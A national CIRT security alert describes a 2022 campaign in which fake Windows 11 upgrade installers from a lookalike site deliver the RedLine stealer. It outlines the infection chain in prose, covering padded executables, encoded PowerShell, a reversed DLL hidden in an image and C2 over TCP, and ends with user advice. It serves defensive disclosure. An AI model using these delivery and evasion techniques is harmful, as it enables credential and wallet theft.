Fake Windows 11 Upgrade Installers infect PC with Redline Malware (10th February 2022)

Ref# AL2022_08 | Date: Feb 10th 2022


Cyber attackers have begun disseminating bogus Windows 11 update software to Windows 10 customers, deceiving users into downloading and installing the RedLine stealer malware.


Since RedLine malware is the most extensively used password, browser cookie, credit card, and cryptocurrency wallet information thief, its assaults can have disastrous implications for victims.

The perpetrators used the supposedly legal “windows-upgraded.com” site as the malware delivery process for their operation, according to HP researchers who discovered it.

The webpage seems to be a legitimate Microsoft site, whereby users who clicked the “Download Now” link obtained a 1.5 MB ZIP download named “Windows11InstallationAssistant.zip,” which was obtained directly from a Discord CDN.

How it works

When you decompress the file, you”ll get a folder that”s 753MB in size, with a compression ratio of 99.8% due to the existence of buffering in the executable.

As the victim runs the application downloaded in their folder, a PowerShell process with an encoded parameter commences. Hence, a cmd.exe process is initiated with a 21 second timeout, that results in a jpg file being retrieved from the remote server.

The file includes a DLL with inverted information, which could be used to avoid discovery and examination.

Moreover, this initiation phase installs the DLL and substitutes it for the existing thread context. This DLL is a RedLine malware payload that uses TCP to communicate to a command-and-control server and receive instructions on what destructive operations it should perform next on the newly infected machine.


To circumvent this type of malware, users are advised to follow the steps below:

  • Before downloading any Microsoft product updates, contact Microsoft directly to see if they have such a website.
  • Sign up for daily updates on worldwide software and hardware updates by registering with numerous CIRTs. CIRT”s internal team and agency counterparts will verify contents before it is posted by CIRT agencies.
  • Be acquainted with Microsoft monthly software upgrades, which is on the second Tuesday in each month, commonly known as Patch Tuesday.
  • Do not download any Microsoft products from any third-party website.

The Guyana National CIRT recommends that users and administrators review this alert and apply it where necessary.

PDF Download: Fake Windows 11 Upgrade Installers infect PC with Redline Malware.pdf